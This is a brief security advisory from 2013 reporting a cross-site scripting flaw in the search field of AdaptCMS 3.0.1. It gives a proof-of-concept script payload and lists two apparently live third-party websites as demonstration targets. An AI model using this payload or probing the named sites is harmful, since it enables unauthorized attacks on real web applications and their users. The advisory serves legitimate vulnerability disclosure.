AdaptCMS version 3.0.1 suffers from a cross site scripting vulnerability.
4f69e17362e1d3e3727d1e8458a9b8c39609e4b39a547dacffe89ebb93f75936
AdaptCMS 3.0.1 Cross Site Scripting Vulnerability
Author : syst3m_f4ult
Homepage : http://www.adaptcms.com/
Vendor : Adapt CMS
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search <http://localhost/login/> [data[Search][q]
parameter]
Insert the following code inside the search box and hit Enter
<script>alert('syst3m_f4ult')</script>
Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/